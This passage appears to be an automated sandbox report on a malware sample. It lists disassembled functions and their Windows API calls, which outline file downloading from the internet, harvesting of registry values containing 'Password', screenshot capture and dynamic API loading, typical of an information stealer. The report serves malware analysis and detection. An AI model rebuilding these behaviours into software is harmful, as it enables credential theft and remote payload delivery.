Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$AllocLocalstrtok
String ID: ERROR
API String ID: 2137491262-2861137601
Opcode ID: 05761cc4364c42234ee252b2b5c3c3c7f577dcc16320945f4f877e0f0401f89e
Instruction ID: 57b76eaee00c9718718f693bae5590ba1c15cb9a89fb7e987ba6136f15d61003
Opcode Fuzzy Hash: 05761cc4364c42234ee252b2b5c3c3c7f577dcc16320945f4f877e0f0401f89e
Instruction Fuzzy Hash: DB51D375A002019FCB20AF75CD49AAB77B5AF44314F04417AF849EB3A1DB78DC468BD8

Function 021BF367 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 163stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 021BF39B
lstrcpy.KERNEL32(00000000,?), ref: 021BF3C9
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 021BF3DD
lstrlen.KERNEL32(00000000), ref: 021BF3EC
LocalAlloc.KERNEL32(00000040,00000001), ref: 021BF40A
StrStrA.SHLWAPI(00000000,?), ref: 021BF438
lstrlen.KERNEL32(?), ref: 021BF44B
strtok.MSVCRT(00000001,?), ref: 021BF45D
lstrlen.KERNEL32(00000000), ref: 021BF469
lstrcpy.KERNEL32(00000000,ERROR), ref: 021BF4B6
lstrcpy.KERNEL32(00000000,ERROR), ref: 021BF4F6

Strings

ERROR, xrefs: 021BF3D7, 021BF476, 021BF4B0, 021BF4F0

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$AllocLocalstrtok
String ID: ERROR
API String ID: 2137491262-2861137601
Opcode ID: 5b04030854d19af2b8db990e9c3e012bdc99472458b3ca0eed52a94b25b620b2
Instruction ID: b0cdb0aa1b6f0b0b68b1122fcc2d35fbd9b06abdbcfadb75619da2cadb201a5f
Opcode Fuzzy Hash: 5b04030854d19af2b8db990e9c3e012bdc99472458b3ca0eed52a94b25b620b2
Instruction Fuzzy Hash: 16515D75A812459FCB22AF38CC58EAE7BF6AF85708F055558FD49DBA10DB34D802CB90

Function 0040A070 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(0091F308,00639BD8,0000FFFF), ref: 0040A086
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0040A0B3
lstrlenA.KERNEL32(00639BD8), ref: 0040A0C0
lstrcpy.KERNEL32(00000000,00639BD8), ref: 0040A0EA
lstrlenA.KERNEL32(00435210), ref: 0040A0F5
lstrcpy.KERNEL32(00000000,00000000), ref: 0040A112
lstrcatA.KERNEL32(00000000,00435210), ref: 0040A11E
lstrcpy.KERNEL32(00000000,00000000), ref: 0040A144
lstrcatA.KERNEL32(00000000,00000000), ref: 0040A14F
lstrcpy.KERNEL32(00000000,00000000), ref: 0040A174
SetEnvironmentVariableA.KERNEL32(0091F308,00000000), ref: 0040A18F
LoadLibraryA.KERNEL32(009258B8), ref: 0040A1A3

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID:
API String ID: 2929475105-0
Opcode ID: e71572c05e61fd10cfa811daea49d805ade7cf6361090e2ab5aad4db3d6ecf1a
Instruction ID: 94f9c8f72257bf504f41825e736cba288604a750adbbaa2107b6746afa8b652b
Opcode Fuzzy Hash: e71572c05e61fd10cfa811daea49d805ade7cf6361090e2ab5aad4db3d6ecf1a
Instruction Fuzzy Hash: E491B231600B009FC7209FA4DC44AA736A6EB44709F40517AF805AB3E1EBBDDD918BD6

Function 021AA2D7 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(006388B4,00639BD8,0000FFFF), ref: 021AA2ED
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021AA31A
lstrlen.KERNEL32(00639BD8), ref: 021AA327
lstrcpy.KERNEL32(00000000,00639BD8), ref: 021AA351
lstrlen.KERNEL32(00435210), ref: 021AA35C
lstrcpy.KERNEL32(00000000,00000000), ref: 021AA379
lstrcat.KERNEL32(00000000,00435210), ref: 021AA385
lstrcpy.KERNEL32(00000000,00000000), ref: 021AA3AB
lstrcat.KERNEL32(00000000,00000000), ref: 021AA3B6
lstrcpy.KERNEL32(00000000,00000000), ref: 021AA3DB
SetEnvironmentVariableA.KERNEL32(006388B4,00000000), ref: 021AA3F6
LoadLibraryA.KERNEL32(00638D78), ref: 021AA40A

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID:
API String ID: 2929475105-0
Opcode ID: bace05496e01b1bd5bfa0f9a446348f260bebc96a6f440727fdd5c41bd0dc464
Instruction ID: 764166dc804a25812079ec58af7ff141f348ba2755a33504b70bbf8d70cc783f
Opcode Fuzzy Hash: bace05496e01b1bd5bfa0f9a446348f260bebc96a6f440727fdd5c41bd0dc464
Instruction Fuzzy Hash: F191EF78680B018FD731ABB4DCA8AA633B3EF85709F444429F905876A1EBB5D940CFD4

Function 0040BCE9 Relevance: 18.2, APIs: 12, Instructions: 249stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 0040BD0F
lstrlenA.KERNEL32(00000000), ref: 0040BD42
lstrcpy.KERNEL32(00000000,00000000), ref: 0040BD6C
lstrcatA.KERNEL32(00000000,00000000), ref: 0040BD74
lstrcpy.KERNEL32(00000000,00000000), ref: 0040BD9C
lstrlenA.KERNEL32(0043509C), ref: 0040BE13

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 3b66287a07ebacd2529adab9549b2e3bbf352f1bbbc10a604505cc36abde3a7d
Instruction ID: 76368cc7b8b4fa27ce7ffa11b26ea8b40865ffa98968743eda1335703526e589
Opcode Fuzzy Hash: 3b66287a07ebacd2529adab9549b2e3bbf352f1bbbc10a604505cc36abde3a7d
Instruction Fuzzy Hash: B4A13D71A012058FCB14DF29C949A9BB7B1EF44304F14847AE405AB3E1DB79DC42CBD8

Function 021BEAE7 Relevance: 18.2, APIs: 12, Instructions: 200stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 021BEB35
lstrcpy.KERNEL32(00000000,?), ref: 021BEB67
lstrcat.KERNEL32(?,00000000), ref: 021BEB73
lstrcat.KERNEL32(?,004354E4), ref: 021BEB8A
SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 021BEBF3
lstrcpy.KERNEL32(00000000,?), ref: 021BEC27
lstrcat.KERNEL32(?,00000000), ref: 021BEC33
lstrcat.KERNEL32(?,00435504), ref: 021BEC4A
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 021BECB8
lstrcpy.KERNEL32(00000000,?), ref: 021BECE9
lstrcat.KERNEL32(?,00000000), ref: 021BECF5
lstrcat.KERNEL32(?,00435518), ref: 021BED0C

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcat$FolderPathlstrcpy
String ID:
API String ID: 818526691-0
Opcode ID: 334e6dd0bb3a256dce1f211927443b096a94995497771f00d173ec70529dc1f7
Instruction ID: 228214d2fec13f362056cebdd348e6d8636c1cb087381ea19424b6e90283282f
Opcode Fuzzy Hash: 334e6dd0bb3a256dce1f211927443b096a94995497771f00d173ec70529dc1f7
Instruction Fuzzy Hash: 7061D271684344AFD324EF74DC45FDE7BA5AF88700F508819FA89C6190DBB4E6088BA6

Function 00418240 Relevance: 18.2, APIs: 12, Instructions: 173stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00418263
lstrlenA.KERNEL32(00000000), ref: 0041829C
lstrcpy.KERNEL32(00000000,00000000), ref: 004182D3
lstrlenA.KERNEL32(00000000), ref: 004182F0
lstrcpy.KERNEL32(00000000,00000000), ref: 00418327
lstrlenA.KERNEL32(00000000), ref: 00418344
lstrcpy.KERNEL32(00000000,00000000), ref: 0041837B
lstrlenA.KERNEL32(00000000), ref: 00418398
lstrcpy.KERNEL32(00000000,00000000), ref: 004183C7
lstrlenA.KERNEL32(00000000), ref: 004183E1
lstrcpy.KERNEL32(00000000,00000000), ref: 00418410
strtok_s.MSVCRT ref: 0041842A

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$strtok_s
String ID:
API String ID: 2211830134-0
Opcode ID: 479635f4f195f76c08dbf8a3615428a40a852f8c8e2790974ea812ab78c6037d
Instruction ID: 84294ead90c4b52274de6bcb271b081bded899c4d10f8e28530b9caff154e1d2
Opcode Fuzzy Hash: 479635f4f195f76c08dbf8a3615428a40a852f8c8e2790974ea812ab78c6037d
Instruction Fuzzy Hash: F3516F716006139BDB149F39D948AABB7A5EF04340F10412AEC05E7384EF78E991CBE4

Function 021C4427 Relevance: 16.7, APIs: 11, Instructions: 178COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 021C44CB
GetDesktopWindow.USER32 ref: 021C44D5
GetWindowRect.USER32(00000000,?), ref: 021C44E3
SelectObject.GDI32(00000000,00000000), ref: 021C451A
GetHGlobalFromStream.COMBASE(?,?), ref: 021C459C
GlobalLock.KERNEL32(?), ref: 021C45A7
GlobalSize.KERNEL32(?), ref: 021C45B6

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
String ID:
API String ID: 1264946473-0
Opcode ID: f1d89ebb8a1d82e9856d53e6c9ad6d898912e967da030e87eb5b05a88891f30c
Instruction ID: 37d75a9c8a315e6996da84a1d8e5abb6def121cb92da529534cb1489b5aeb77c
Opcode Fuzzy Hash: f1d89ebb8a1d82e9856d53e6c9ad6d898912e967da030e87eb5b05a88891f30c
Instruction Fuzzy Hash: 745103B5614340AFD310EF64DC88EAABBEAAB88714F00491DF995C3250DB74E905CFA2

Function 021BE327 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,00638B0C), ref: 021BE394
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 021BE3BE
lstrcpy.KERNEL32(00000000,?), ref: 021BE3F6
lstrcat.KERNEL32(?,00000000), ref: 021BE404
lstrcat.KERNEL32(?,?), ref: 021BE41F
lstrcat.KERNEL32(?,?), ref: 021BE433
lstrcat.KERNEL32(?,00638A84), ref: 021BE447
lstrcat.KERNEL32(?,?), ref: 021BE45B
lstrcat.KERNEL32(?,00638AC8), ref: 021BE46E
lstrcpy.KERNEL32(00000000,?), ref: 021BE4A6
GetFileAttributesA.KERNEL32(00000000), ref: 021BE4AD

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$AttributesFileFolderPath
String ID:
API String ID: 4230089145-0
Opcode ID: efdba4d8b89c5cc5677c8f72ff9d71f47fb5f6e71c51ae459b2a2002eafe85b4
Instruction ID: eb2c2ef68bfb977cddaaeff831a71512245134c16d2caeb762ded938b8b19d5c
Opcode Fuzzy Hash: efdba4d8b89c5cc5677c8f72ff9d71f47fb5f6e71c51ae459b2a2002eafe85b4
Instruction Fuzzy Hash: 9A616CB5901218AFCB25DF74CD54ADDB7B6AF88300F1089A9E949E3250DB74AF84DF90

Function 00406A10 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00406A3F
InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 00406A6C
StrCmpCA.SHLWAPI(?,00926628), ref: 00406A8A
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00406AAA
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406AC8
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406AE1
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00406B06
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00406B30
CloseHandle.KERNEL32(00000000), ref: 00406B50
InternetCloseHandle.WININET(00000000), ref: 00406B57
InternetCloseHandle.WININET(?), ref: 00406B61

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
String ID:
API String ID: 2500263513-0
Opcode ID: 885081f6fd0acedf355e9bb4124bd6bae7afd19d039d18dcdc55a63b4105ae60
Instruction ID: 214ef142a420c546876de0997919582a0985ebf66699d200bad1b39cea3fe35b
Opcode Fuzzy Hash: 885081f6fd0acedf355e9bb4124bd6bae7afd19d039d18dcdc55a63b4105ae60
Instruction Fuzzy Hash: D2417EB1B00215ABDB20DF64DC49FAE77B9AB44704F104569FA05F72C0DBB4AA418BA8

Function 021A6C77 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 021A6CA6
InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 021A6CD3
StrCmpCA.SHLWAPI(?,00638C80), ref: 021A6CF1
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 021A6D11
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 021A6D2F
InternetReadFile.WININET(00000000,?,00000400,?), ref: 021A6D48
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 021A6D6D
InternetReadFile.WININET(00000000,?,00000400,?), ref: 021A6D97
CloseHandle.KERNEL32(00000000), ref: 021A6DB7
InternetCloseHandle.WININET(00000000), ref: 021A6DBE
InternetCloseHandle.WININET(?), ref: 021A6DC8

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
String ID:
API String ID: 2500263513-0
Opcode ID: cc38f937b6d9044345b358c1caff838f268f9b3664d4dee0a204f6f11099f684
Instruction ID: df7c2950b9075fca8819f1f6a6e1660d0800dfc5675c979c828b2b52ffc9fbb8
Opcode Fuzzy Hash: cc38f937b6d9044345b358c1caff838f268f9b3664d4dee0a204f6f11099f684
Instruction Fuzzy Hash: 20417CB5A40209AFDF20DF64DC55FEE77AAAB44744F144458FA05E7280DF70AA408BA4

Function 021C4A67 Relevance: 16.5, APIs: 11, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(0043573C,?,021B79A8), ref: 021C4A6D
GetProcAddress.KERNEL32(00000000,00435748), ref: 021C4A83
GetProcAddress.KERNEL32(00000000,00435750), ref: 021C4A94
GetProcAddress.KERNEL32(00000000,0043575C), ref: 021C4AA5
GetProcAddress.KERNEL32(00000000,00435768), ref: 021C4AB6
GetProcAddress.KERNEL32(00000000,00435770), ref: 021C4AC7
GetProcAddress.KERNEL32(00000000,0043577C), ref: 021C4AD8
GetProcAddress.KERNEL32(00000000,00435784), ref: 021C4AE9
GetProcAddress.KERNEL32(00000000,0043578C), ref: 021C4AFA
GetProcAddress.KERNEL32(00000000,0043579C), ref: 021C4B0B
GetProcAddress.KERNEL32(00000000,004357A8), ref: 021C4B1C

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: f2223fcb320c708e67ee859b9f5f9b1d6605f49617afa15cb912c6ce6d96c9dc
Instruction ID: 17ebaa9f0e65257ec3bcd38783a6ae5805ba2be44e0526fdbb4729248a145773
Opcode Fuzzy Hash: f2223fcb320c708e67ee859b9f5f9b1d6605f49617afa15cb912c6ce6d96c9dc
Instruction Fuzzy Hash: 18117576951720EF8714AFB5AD4DA9A3ABABA0E70AB14381FF151D3160DBF84004DFE4

Function 004180E0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00418105
lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042093B), ref: 0041814B
lstrcpy.KERNEL32(00000000,00000000), ref: 0041817A
StrCmpCA.SHLWAPI(00000000,00435204,?,?,?,?,?,0042093B), ref: 00418192
lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042093B), ref: 004181D0
lstrcpy.KERNEL32(00000000,00000000), ref: 004181FF
strtok_s.MSVCRT ref: 0041820F

Strings

;B, xrefs: 004180F1, 00418209, 004180FB, 0041820C
fplugins, xrefs: 004180E6

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlenstrtok_s
String ID: ;B$fplugins
API String ID: 3280532728-1193078497
Opcode ID: 713ed03d311a4750fa88e0bed59657df25361087ac739758ea01ec1891f1f295
Instruction ID: 7bc27923b6a5a417a1ea9fc553f6de9f23466f0c50f763b4e3e6f257422fb611
Opcode Fuzzy Hash: 713ed03d311a4750fa88e0bed59657df25361087ac739758ea01ec1891f1f295
Instruction Fuzzy Hash: 2741A275600206AFCB21DF68D948BABBBF4EF44700F11415EE855E7254EF78D981CB94

Function 004079A0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 109stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00407710: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407745
Part of subcall function 00407710: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040778A
Part of subcall function 00407710: strlen.MSVCRT ref: 004077BE
Part of subcall function 00407710: StrStrA.SHLWAPI(?,Password), ref: 004077F8
Part of subcall function 00407710: strcpy_s.MSVCRT ref: 00407821
Part of subcall function 00407710: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040782C
Part of subcall function 00407710: HeapFree.KERNEL32(00000000), ref: 00407833
Part of subcall function 00407710: strlen.MSVCRT ref: 00407840

lstrcatA.KERNEL32(00000000,0043509C), ref: 004079D0
lstrcatA.KERNEL32(00000000,?), ref: 004079FD
lstrcatA.KERNEL32(00000000, : ), ref: 00407A0F
lstrcatA.KERNEL32(00000000,?), ref: 00407A30
wsprintfA.USER32 ref: 00407A50
lstrcpy.KERNEL32(00000000,?), ref: 00407A79
lstrcatA.KERNEL32(00000000,00000000), ref: 00407A87
